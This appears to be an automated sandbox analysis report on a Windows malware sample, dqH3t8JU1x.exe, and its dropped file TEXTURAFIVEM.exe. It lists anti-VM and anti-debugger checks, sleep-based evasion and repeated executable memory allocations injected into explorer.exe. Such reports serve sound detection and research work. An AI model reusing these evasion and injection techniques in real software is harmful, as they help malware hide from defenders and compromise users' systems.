Source: C:\Windows\SysWOW64\explorer.exe TID: 3912 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5664 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00405D04 FindFirstFileA,FindClose,1_2_00405D04
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: 4_2_00405D04 FindFirstFileA,FindClose,4_2_00405D04
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: 5_2_00405D04 FindFirstFileA,FindClose,5_2_00405D04
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: 9_2_00405D04 FindFirstFileA,FindClose,9_2_00405D04
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24016C78 FindFirstFileA,FindClose,20_2_24016C78
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_240145F0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,20_2_240145F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2403D390 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,20_2_2403D390
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_240163E8 FindFirstFileA,GetLastError,20_2_240163E8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24016C77 FindFirstFileA,FindClose,20_2_24016C77
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24015FE2 FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,20_2_24015FE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24015FE4 FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,20_2_24015FE4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_240409E4 FindFirstFileA,FindNextFileA,FindClose,20_2_240409E4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2404092C GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,20_2_2404092C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2401F870 GetVersionExW,GetVersionExW,GetSystemInfo,GetSystemMetrics,20_2_2401F870
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 1800000 (2 occurrences)
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 922337203685477 (64 occurrences)
Source: WerFault.exe, 00000025.00000002.629394673.000000000518D000.00000004.00000001.sdmp Binary or memory string: <arg nm="syspro" val="VMware7,1" />
Source: explorer.exe, 00000002.00000000.358980773.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.358937907.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.354523818.0000000005D50000.00000002.00000001.sdmp, WerFault.exe, 0000001C.00000002.586599834.0000000005470000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.595640630.0000000005800000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.606719999.0000000004D50000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.631104983.0000000005750000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000025.00000002.629394673.000000000518D000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW0
Source: explorer.exe, 00000002.00000000.355181915.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp Binary or memory string: VBoxService.exeS3
Source: WerFault.exe, 0000001C.00000003.566918702.0000000004FAB000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.593349263.000000000507A000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.601174434.0000000000AD8000.00000004.00000020.sdmp, WerFault.exe, 00000025.00000002.628768421.0000000005068000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000023.00000002.604686381.0000000004A50000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW(X
Source: explorer.exe, 00000002.00000000.354523818.0000000005D50000.00000002.00000001.sdmp, WerFault.exe, 0000001C.00000002.586599834.0000000005470000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.595640630.0000000005800000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.606719999.0000000004D50000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.631104983.0000000005750000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 0000001C.00000003.561731447.0000000004FCC000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.585462886.000000000519D000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp Binary or memory string: VBoxService.exe
Source: explorer.exe, 00000002.00000000.355181915.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.358937907.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000001E.00000002.612425075.0000000003A72000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
Source: explorer.exe, 00000002.00000000.358728033.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000002.00000000.354523818.0000000005D50000.00000002.00000001.sdmp, WerFault.exe, 0000001C.00000002.586599834.0000000005470000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.595640630.0000000005800000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.606719999.0000000004D50000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.631104983.0000000005750000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000025.00000002.630589777.00000000055E0000.00000004.00000001.sdmp Binary or memory string: VMware7,1(
Source: WerFault.exe, 00000025.00000002.621694558.000000000360B000.00000004.00000040.sdmp Binary or memory string: VMware, Inc.zpL

Note: apart from the VBoxService.exe strings in TEXTURAFIVEM.exe, the VMware and Hyper-V strings above were read from the memory of explorer.exe and WerFault.exe. They are device, vendor and error-message strings that Windows itself populates on the analysis VM and are not by themselves evidence that the sample inspects them. The sample's own embedded checks are the VBoxService.exe and SBIEDLL.DLL strings found in dqH3t8JU1x.exe and TEXTURAFIVEM.exe.
            Source: explorer.exe, 00000002.00000000.358728033.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: WerFault.exe, 00000025.00000002.629394673.000000000518D000.00000004.00000001.sdmpBinary or memory string: <arg nm="sysmfg" val="VMware, Inc." />
            Source: explorer.exe, 00000002.00000000.358980773.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
            Source: explorer.exe, 00000002.00000000.354523818.0000000005D50000.00000002.00000001.sdmp, WerFault.exe, 0000001C.00000002.586599834.0000000005470000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.595640630.0000000005800000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.606719999.0000000004D50000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.631104983.0000000005750000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: explorer.exe, 00000002.00000002.610418959.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
            Source: C:\Windows\install\TEXTURAFIVEM.exeFile opened: NTICE
            Source: C:\Windows\install\TEXTURAFIVEM.exeFile opened: SICE
            Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00455C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00455C10
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_004056DC mov eax, dword ptr fs:[00000030h]1_2_004056DC
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00405684 mov eax, dword ptr fs:[00000030h]1_2_00405684
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00405770 mov eax, dword ptr fs:[00000030h]1_2_00405770
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_004056DC mov eax, dword ptr fs:[00000030h]4_2_004056DC
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_00405684 mov eax, dword ptr fs:[00000030h]4_2_00405684
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_00405770 mov eax, dword ptr fs:[00000030h]4_2_00405770
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_004056DC mov eax, dword ptr fs:[00000030h]5_2_004056DC
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_00405684 mov eax, dword ptr fs:[00000030h]5_2_00405684
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_00405770 mov eax, dword ptr fs:[00000030h]5_2_00405770
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_004056DC mov eax, dword ptr fs:[00000030h]9_2_004056DC
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_00405684 mov eax, dword ptr fs:[00000030h]9_2_00405684
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_00405770 mov eax, dword ptr fs:[00000030h]9_2_00405770
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_004032F5 GetProcessHeap,GetCurrentThreadId,1_2_004032F5
            Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 24010000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 2990000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 4C00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 4C20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 4CB0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 4D40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 61B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 61F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 6280000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 62A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 62C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 6550000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 6570000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 6590000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 65C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7450000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7480000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 64E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 6500000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 6520000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 6540000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7620000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7640000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7670000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 76A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 76D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7420000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7700000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7730000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7760000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 77B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 77E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7810000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7470000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7840000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7870000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 78A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 78E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7910000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7940000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7970000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 79A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 78B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 75A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 75D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7600000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7A50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7A80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 79C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7CE0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7D20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7D70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7DB0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7E00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7EC0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7F00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: A940000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: A970000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: D230000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: D270000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: E130000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: E170000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: E530000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: E570000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: E6B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: E6F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: E730000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: E770000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: E7B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: E7F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: E830000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: E870000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: EA30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: EA70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: EAB0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: EAF0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: EB30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: EC00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: EBB0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: EB90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: EC60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F080000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F0E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F520000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F070000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: ECF0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 2980000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: FAC0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: FB00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: FB10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: AA0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F0B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: FBB0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: FC30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: FCD0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: FD10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F030000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: FD50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: FD90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F560000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F5A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F5E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F620000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F660000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F6A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F6E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F720000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F760000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F7A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F7E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F820000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: F860000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 29A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 4DE0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 4E10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 4E50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 4E90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 4EC0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7230000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7260000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 7290000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 72C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: 72F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: AEC0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: AE60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: AE90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: AED0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: AF00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: B0A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: B0F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\explorer.exe base: B120000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 24080000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3330000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3340000 protect: page execute and read and write
